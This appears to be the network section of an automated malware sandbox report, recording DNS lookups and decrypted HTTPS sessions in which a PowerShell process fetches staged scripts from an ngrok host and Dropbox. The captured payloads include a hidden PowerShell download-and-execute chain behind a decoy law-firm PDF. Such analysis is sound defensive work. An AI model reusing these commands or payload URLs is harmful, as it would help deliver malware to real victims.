                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.644932985 CET1.1.1.1192.168.2.70xeaa0No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.644932985 CET1.1.1.1192.168.2.70xeaa0No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.692516088 CET1.1.1.1192.168.2.70xc373No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.692516088 CET1.1.1.1192.168.2.70xc373No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.692801952 CET1.1.1.1192.168.2.70x54c4No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:37.533379078 CET1.1.1.1192.168.2.70x1afeNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:37.533379078 CET1.1.1.1192.168.2.70x1afeNo error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:37.534471989 CET1.1.1.1192.168.2.70xfa8No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.167604923 CET1.1.1.1192.168.2.70x41d1No error (0)uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:41.167604923 CET1.1.1.1192.168.2.70x41d1No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:48.136051893 CET1.1.1.1192.168.2.70x69a3No error (0)ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:48.136051893 CET1.1.1.1192.168.2.70x69a3No error (0)edge-block-www-env.dropbox-dns.com162.125.65.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:35.997744083 CET1.1.1.1192.168.2.70x69a5No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:35.997744083 CET1.1.1.1192.168.2.70x69a5No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:36.993992090 CET1.1.1.1192.168.2.70x69a5No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:36.993992090 CET1.1.1.1192.168.2.70x69a5No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:37.994857073 CET1.1.1.1192.168.2.70x69a5No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:37.994857073 CET1.1.1.1192.168.2.70x69a5No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:40.008821964 CET1.1.1.1192.168.2.70x69a5No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:40.008821964 CET1.1.1.1192.168.2.70x69a5No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:44.014533043 CET1.1.1.1192.168.2.70x69a5No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:44.014533043 CET1.1.1.1192.168.2.70x69a5No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:43:20.409794092 CET1.1.1.1192.168.2.70x20eaNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:43:20.409794092 CET1.1.1.1192.168.2.70x20eaNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:43:21.399647951 CET1.1.1.1192.168.2.70x20eaNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:43:21.399647951 CET1.1.1.1192.168.2.70x20eaNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:43:22.401583910 CET1.1.1.1192.168.2.70x20eaNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:43:22.401583910 CET1.1.1.1192.168.2.70x20eaNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                      • 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                                                                                                                                                                                                                                                                                                      • www.dropbox.com
                                                                                                                                                                                                                                                                                                      • uc4d30225f32433b48811132b259.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                      • ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                      • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      • uc7569213660364555d096b4af3d.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                      • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                      • uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                      • ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.com

                                                                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      0192.168.2.74970218.192.31.1654437600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:19 UTC230OUTGET /api/secure/147a893e0e699b17117c599fde51f7ef HTTP/1.1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                      Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:21 UTC321INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 395
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:21 GMT
                                                                                                                                                                                                                                                                                                      Location: https://www.dropbox.com/scl/fi/u9gqxhe9ae7eoc4nj5zgg/secure.txt?rlkey=81b4cx59cxmphht7wgm6rjb5m&dl=1
                                                                                                                                                                                                                                                                                                      Server: Werkzeug/3.0.3 Python/3.12.8
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:21 UTC395INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 73 68 6f 75 6c 64 20 62 65 20 72 65 64 69 72 65 63 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 74 6f 20 74 68 65 20 74 61 72 67 65 74 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 75 39 67 71 78 68 65 39 61 65 37 65 6f 63 34 6e 6a 35 7a 67 67 2f 73 65 63 75 72 65 2e 74 78 74 3f 72 6c 6b 65 79 3d 38 31 62 34 63 78 35 39 63 78 6d 70 68 68 74 37 77 67 6d 36 72 6a 62 35 6d 26 61 6d 70 3b
                                                                                                                                                                                                                                                                                                      Data Ascii: <!doctype html><html lang=en><title>Redirecting...</title><h1>Redirecting...</h1><p>You should be redirected automatically to the target URL: <a href="https://www.dropbox.com/scl/fi/u9gqxhe9ae7eoc4nj5zgg/secure.txt?rlkey=81b4cx59cxmphht7wgm6rjb5m&amp;


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      1192.168.2.749708162.125.69.184437600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:23 UTC236OUTGET /scl/fi/u9gqxhe9ae7eoc4nj5zgg/secure.txt?rlkey=81b4cx59cxmphht7wgm6rjb5m&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                      Host: www.dropbox.com
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:24 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Content-Security-Policy: style-src https://* 'unsafe-inline' 'unsafe-eval' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsen [TRUNCATED]
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Location: https://uc4d30225f32433b48811132b259.dl.dropboxusercontent.com/cd/0/get/CgA8JuLWs7OjpVcFSgSqCoN1g_Tobb4iAfwkVoRbgR9qbAMmbxyAidqJNIi7Huw-hcGBD0ufTwW6CHbX0n9FQnC0MuzybQiO6NPUmvJaYNL-OcXb4tP6ZNkzf0t3vICLxdb6nduGvjzFLP1Hq4Rt5zOm/file?dl=1#
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                      Set-Cookie: gvc=NzQ5ODkxMzY5Njk3NDU2NTcyODczODAxNzY3NjQ0OTA1NDM5NDU=; Path=/; Expires=Sun, 09 Dec 2029 17:41:23 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: t=8rNoA4_uwL6jcrHGq9IcWO6n; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:23 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: __Host-js_csrf=8rNoA4_uwL6jcrHGq9IcWO6n; Path=/; Expires=Wed, 10 Dec 2025 17:41:23 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: __Host-ss=MaNeDR41XE; Path=/; Expires=Wed, 10 Dec 2025 17:41:23 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                                      Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:23 GMT
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Content-Length: 17
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:24 GMT
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                      Server: envoy
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                      X-Dropbox-Request-Id: 407de9591dba45ba81e738934c0512eb
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:24 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      2192.168.2.749714162.125.69.154437600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:26 UTC370OUTGET /cd/0/get/CgA8JuLWs7OjpVcFSgSqCoN1g_Tobb4iAfwkVoRbgR9qbAMmbxyAidqJNIi7Huw-hcGBD0ufTwW6CHbX0n9FQnC0MuzybQiO6NPUmvJaYNL-OcXb4tP6ZNkzf0t3vICLxdb6nduGvjzFLP1Hq4Rt5zOm/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                      Host: uc4d30225f32433b48811132b259.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:27 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="secure.txt"; filename*=UTF-8''secure.txt
                                                                                                                                                                                                                                                                                                      Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                      Etag: 1733742738703057d
                                                                                                                                                                                                                                                                                                      Pragma: public
                                                                                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                                      X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                      X-Server-Response-Time: 181
                                                                                                                                                                                                                                                                                                      X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:26 GMT
                                                                                                                                                                                                                                                                                                      Server: envoy
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      Content-Length: 411
                                                                                                                                                                                                                                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                      X-Dropbox-Request-Id: c77daa2ae1da4b0ab11287182491c888
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:27 UTC411INData Raw: 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 6d 73 65 64 67 65 2e 65 78 65 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 2d 6b 69 6f 73 6b 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 64 67 69 75 72 36 34 76 61 77 6d 64 78 39 61 6c 71 77 36 65 74 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 6b 64 75 68 71 72 6e 70 30 30 72 6a 34 34 72 6a 65 70 70 75 77 33 31 71 6b 26 64 6c 3d 31 22 3b 20 24 52 61 6e 64 6f 6d 46 69 6c 65 4e 61 6d 65 20 3d 20 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 62 61 74 22 3b 20 49 57 52 20 2d 55 72 69 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 70 38 66 38
                                                                                                                                                                                                                                                                                                      Data Ascii: Start-Process msedge.exe -ArgumentList "--kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1"; $RandomFileName = "$env:temp\$(Get-Random).bat"; IWR -Uri "https://www.dropbox.com/scl/fi/p8f8


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      3192.168.2.749726162.125.69.184437600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:31 UTC212OUTGET /scl/fi/p8f846myv0cbs5975uszw/loader.txt?rlkey=xzx17r7jhir5r28db7j4zb4sl&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                      Host: www.dropbox.com
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:32 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Content-Security-Policy: object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; media-src https://* blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sand [TRUNCATED]
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Location: https://ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.com/cd/0/get/CgDuChhAhq4ymWrN2fW3pQFL0ERw62yLj1sISkvYJvyGBBxrec-guM6espnuVHhttXVGn6x43Swr7_AEalUXvAd4pMNhp6sfpbvTO6u9T55U_zuSnk9EfpX_z6ewBA9S4itVeH11I07C35wE49n3aa_d/file?dl=1#
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                      Set-Cookie: gvc=ODgyNjE2MjI2ODgwNTAyMDA3NzA3NzAwMTQxMDgwOTc1NDY0MjI=; Path=/; Expires=Sun, 09 Dec 2029 17:41:31 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: t=XZz2SzlwsaxuOLb7HETXVXy8; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:31 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: __Host-js_csrf=XZz2SzlwsaxuOLb7HETXVXy8; Path=/; Expires=Wed, 10 Dec 2025 17:41:31 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: __Host-ss=SpFOl4uKjs; Path=/; Expires=Wed, 10 Dec 2025 17:41:31 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                                      Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:31 GMT
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Content-Length: 17
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:32 GMT
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                      Server: envoy
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                      X-Dropbox-Request-Id: 5d9575e9a8ab473b903e3f235299bdc0
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:32 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      4192.168.2.749741162.125.69.154437600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:34 UTC370OUTGET /cd/0/get/CgDuChhAhq4ymWrN2fW3pQFL0ERw62yLj1sISkvYJvyGBBxrec-guM6espnuVHhttXVGn6x43Swr7_AEalUXvAd4pMNhp6sfpbvTO6u9T55U_zuSnk9EfpX_z6ewBA9S4itVeH11I07C35wE49n3aa_d/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                      Host: ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:35 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="loader.txt"; filename*=UTF-8''loader.txt
                                                                                                                                                                                                                                                                                                      Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                      Etag: 1733742736350978d
                                                                                                                                                                                                                                                                                                      Pragma: public
                                                                                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                                      X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                      X-Server-Response-Time: 149
                                                                                                                                                                                                                                                                                                      X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:34 GMT
                                                                                                                                                                                                                                                                                                      Server: envoy
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      Content-Length: 519
                                                                                                                                                                                                                                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                      X-Dropbox-Request-Id: 688513a2c951487f9a75999fb4ddceeb
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:35 UTC519INData Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 2d 43 6f 6d 6d 61 6e 64 20 5e 0d 0a 20 20 20 20 22 24 52 61 6e 64 6f 6d 50 44 46 20 3d 20 5c 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 70 64 66 5c 22 3b 20 24 52 61 6e 64 6f 6d 45 58 45 20 3d 20 5c 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 65 78 65 5c 22 3b 20 49 57 52 20 2d 55 72 69 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 64 67 69 75 72 36 34 76 61 77 6d 64 78 39 61 6c 71 77 36 65 74 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 6b 64 75 68 71 72 6e 70 30 30 72 6a 34 34
                                                                                                                                                                                                                                                                                                      Data Ascii: @echo offpowershell -WindowStyle Hidden -Command ^ "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      5192.168.2.749742162.125.69.184436700C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:35 UTC764OUTGET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: www.dropbox.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
